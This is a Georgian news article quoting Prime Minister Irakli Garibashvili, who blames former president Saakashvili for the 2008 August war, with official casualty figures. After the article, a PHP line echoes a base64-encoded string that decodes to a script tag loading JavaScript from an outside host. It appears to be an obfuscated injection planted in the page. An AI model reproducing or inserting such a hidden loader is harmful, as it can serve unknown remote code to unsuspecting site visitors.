celsiusi
ავერსი საქკაბელი
მიხეილ სააკაშვილის გაუთვლელი პროვოკაციული ნაბიჯების გამო ქვეყანამ ომი ვერ აიცილა, - ამის შესახებ პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა 2008 წლის აგვისტოს ომთან დაკავშირებით კომენტირებისას განაცხადა. 
 
მისი თქმით, სააკაშვილმა და მისმა გუნდმა ქვეყანას უღალატეს და ხალხი გასწირეს.
 
„ჩვენ ყველანი დღეს ვართ შეკრებილი იმისთვის, რომ ქედი მოვიხაროთ ჩვენი გმირების წინაშე. მე მინდა შეგახსენოთ ყველას, რომ თარიღი 8 აგვისტო არასოდეს გამხდარა განხილვის საგანი. ყოფილი ხელისუფლების წარმომადგენლები ყოველთვის 8 აგვისტოს ამოდიოდნენ. საერთოდ უხერხულია ჩვენი გმირი სამხედროების ოჯახებთან.
 
მთავარი რაც არის, არის შემდეგი თქვენი ტელევიზიების დეფაქტო მფლობელი ყოფილი პრეზიდენტი სააკაშვილის უგუნურმა პოლიტიკამ, მისმა გაუთვლელმა პროვოკაციულმა ნაბიჯებმა განაპირობა ის, რომ მათ თვიდან ვერ აიცილეს ეს ომი. ეს იყო სააკაშვილის და მისი გუნდის ღალატი მათ გაწირეს ჩვენი ქვეყანა და ხალხი“, – განაცხადა ღარიბაშვილმა.
 
წელს 14 წელიწადი გავიდა 2008 წლის სამხედრო კონფლიქტის დაწყებიდან, რომელიც „აგვისტოს ომის“ სახელით მოიხსენიებენ. ომი 5 დღე გაგრძელდა, რის შემდეგაც საქართველომ დაკარგა კონტროლი კოდორის ხეობასა და ახალგორის რაიონზე.
 
ოფიციალური ინფორმაციით, 2008 წლის აგვისტოში საქართველოში რუსეთის შეჭრის შედეგად დაღუპულია საქართველოს თავდაცვის სამინისტროს 169 მოსამსახურე, შინაგან საქმეთა სამინისტროს 14 თანამშრომელი და 224 სამოქალაქო პირი.
480
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");